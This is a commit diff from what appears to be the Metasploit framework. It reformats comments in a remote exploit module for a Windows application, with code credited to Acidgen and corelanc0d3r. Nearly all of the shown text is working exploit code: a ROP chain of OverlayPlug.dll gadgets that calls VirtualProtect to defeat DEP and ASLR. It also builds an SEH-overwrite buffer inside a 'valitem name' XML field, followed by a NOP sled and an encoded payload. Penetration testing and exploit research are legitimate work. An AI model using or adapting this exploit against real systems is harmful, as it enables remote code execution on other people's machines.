Format issue fix

git-svn-id: file:///home/svn/framework3/trunk@12299 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Wei Chen 2011-04-11 22:28:38 +00:00
parent 36367f8a67
commit 300989db5f
1 changed files with 33 additions and 33 deletions


@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>
[ [
'Acidgen', #found the vulnerability 'Acidgen', #found the vulnerability
'corelanc0d3r', #rop exploit + msf module 'corelanc0d3r', #rop exploit + msf module
], ],
'Version' => '$Revision$', 'Version' => '$Revision$',
@ -113,26 +113,26 @@ class Metasploit3 < Msf::Exploit::Remote
# one non-ASLR module is enough for generic ASLR & DEP bypass ! # one non-ASLR module is enough for generic ASLR & DEP bypass !
# pvefindaddr rop 'n roll # pvefindaddr rop 'n roll
# First, grab VirtualProtect ptr # First, grab VirtualProtect ptr
0x10065292, # POP EAX # RETN [Module : OverlayPlug.dll] ** 0x10065292, # POP EAX # RETN [OverlayPlug.dll]
0x106F4244, # IAT entry + offsqet (bad char friendly) 0x106F4244, # IAT entry + offsqet (bad char friendly)
0x10019762, # POP EBP # RETN [Module : OverlayPlug.dll] ** 0x10019762, # POP EBP # RETN [OverlayPlug.dll]
0xEFEFEFF0, # bye bye offset 0xEFEFEFF0, # bye bye offset
0x10084977, # ADD EBP,EAX # RETN [Module : OverlayPlug.dll] ** 0x10084977, # ADD EBP,EAX # RETN [OverlayPlug.dll]
0x100684B8, # MOV EAX,EBP # POP ESI # POP EBP # POP EBX # RETN [Module : OverlayPlug.dll] ** 0x100684B8, # MOV EAX,EBP # POP ESI # POP EBP # POP EBX # RETN [OverlayPlug.dll]
rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i,
rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i,
rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i,
0x1005E114, # MOV EAX,DWORD PTR DS:[EAX] # RETN [Module : OverlayPlug.dll] ** 0x1005E114, # MOV EAX,DWORD PTR DS:[EAX] # RETN [OverlayPlug.dll]
0x10016A56, # XCHG EAX,ESI [Module : OverlayPlug.dll] ** 0x10016A56, # XCHG EAX,ESI [OverlayPlug.dll]
# set size # set size
0x100A9274, # POP EAX # RETN [Module : OverlayPlug.dll] ** 0x100A9274, # POP EAX # RETN [OverlayPlug.dll]
0x10101330, # 0x320 bytes - change this if needed, but don't make it too big :) 0x10101330, # 0x320 bytes - change this if needed, but don't make it too big :)
0x10019762, # POP EBP # RETN [Module : OverlayPlug.dll] ** 0x10019762, # POP EBP # RETN [OverlayPlug.dll]
0xEFEFEFF0, # boo 0xEFEFEFF0, # boo
0x10084977, # ADD EBP,EAX # RETN [Module : OverlayPlug.dll] ** 0x10084977, # ADD EBP,EAX # RETN [OverlayPlug.dll]
0x10053E4C, # XCHG EAX,EBP # RETN [Module : OverlayPlug.dll] ** 0x10053E4C, # XCHG EAX,EBP # RETN [OverlayPlug.dll]
0x10066D8C, # PUSH EAX # ADD AL,5D # POP EBX # MOV DWORD PTR FS:[0],ECX # ADD ESP,50 # RETN 10 [Module : OverlayPlug.dll] ** 0x10066D8C, # PUSH EAX # ADD AL,5D # POP EBX # MOV DWORD PTR FS:[0],ECX # ADD ESP,50 # RETN 10 [OverlayPlug.dll]
rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i,
rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i,
rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i,
@ -155,38 +155,38 @@ class Metasploit3 < Msf::Exploit::Remote
rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i,
# set NewProtect to 0x40 # set NewProtect to 0x40
0x100E3D4A, # XOR EAX,EAX # XOR EDX,EDX # RETN [Module : OverlayPlug.dll] ** 0x100E3D4A, # XOR EAX,EAX # XOR EDX,EDX # RETN [OverlayPlug.dll]
rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i,
rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i,
rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i,
rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i,
0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [Module : OverlayPlug.dll] ** 0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [OverlayPlug.dll]
rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i,
0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [Module : OverlayPlug.dll] ** 0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [OverlayPlug.dll]
rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i,
rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i,
0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [Module : OverlayPlug.dll] ** 0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [OverlayPlug.dll]
rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i,
rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i,
0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [Module : OverlayPlug.dll] ** 0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [OverlayPlug.dll]
rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i,
rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i,
0x10030C8B, # ADD DL,AL # ADD AL,0 # MOV EAX,EDX # RETN 4 [Module : OverlayPlug.dll] ** 0x10030C8B, # ADD DL,AL # ADD AL,0 # MOV EAX,EDX # RETN 4 [OverlayPlug.dll]
rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i,
# write pOldProtect to .data section # write pOldProtect to .data section
0x1001AB51, # POP ECX # RETN [Module : OverlayPlug.dll] ** 0x1001AB51, # POP ECX # RETN [OverlayPlug.dll]
rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i,
0x10117030, # RW 0x10117030, # RW
# EDI : ROP NOP # EDI : ROP NOP
0x10057090, # POP EDI # RETN [Module : OverlayPlug.dll] ** 0x10057090, # POP EDI # RETN [OverlayPlug.dll]
0x10057091, # ROP NOP 0x10057091, # ROP NOP
# pReturn2Payload # pReturn2Payload
0x100BC8E8, # PUSH ESP # MOV EAX,ESI # POP ESI # RETN [Module : OverlayPlug.dll] ** 0x100BC8E8, # PUSH ESP # MOV EAX,ESI # POP ESI # RETN [OverlayPlug.dll]
0x10016A56, # XCHG EAX,ESI # RETN [Module : OverlayPlug.dll] ** 0x10016A56, # XCHG EAX,ESI # RETN [OverlayPlug.dll]
0x1003C946, # ADD EAX,0A # RETN [Module : OverlayPlug.dll] 0x1003C946, # ADD EAX,0A # RETN [OverlayPlug.dll]
0x1003C946, 0x1003C946,
0x1003C946, 0x1003C946,
0x1003C946, 0x1003C946,
@ -206,23 +206,23 @@ class Metasploit3 < Msf::Exploit::Remote
0x1003C946, 0x1003C946,
0x1003C946, 0x1003C946,
0x1003C946, 0x1003C946,
0x1001FDBD, # XCHG EAX,EBP # RETN [Module : OverlayPlug.dll] ** 0x1001FDBD, # XCHG EAX,EBP # RETN [OverlayPlug.dll]
0x100A9274, # POP EAX # RETN [Module : OverlayPlug.dll] ** 0x100A9274, # POP EAX # RETN [OverlayPlug.dll]
0x41414141, 0x41414141,
# go # go
0x10066F84, # PUSHAD # RETN [Module : OverlayPlug.dll] ** 0x10066F84, # PUSHAD # RETN [OverlayPlug.dll]
].pack("V*") ].pack("V*")
buffer = "<valitem name=" buffer = "<valitem name="
buffer << '"' buffer << '"'
buffer << rand_text_alphanumeric((target['OffSet'])) buffer << rand_text_alphanumeric((target['OffSet']))
buffer << rand_text_alphanumeric(4) #nseh buffer << rand_text_alphanumeric(4) #nseh
buffer << pivot buffer << pivot
buffer << rand_text_alphanumeric((target['OffSetToRop'])) buffer << rand_text_alphanumeric((target['OffSetToRop']))
buffer << "\x91\x70\x05\x10" * 10 #rop nop, offset Win7 buffer << "\x91\x70\x05\x10" * 10 #rop nop, offset Win7
buffer << rop_gadgets buffer << rop_gadgets
buffer << "\x90" * 150 buffer << "\x90" * 150
buffer << payload.encoded buffer << payload.encoded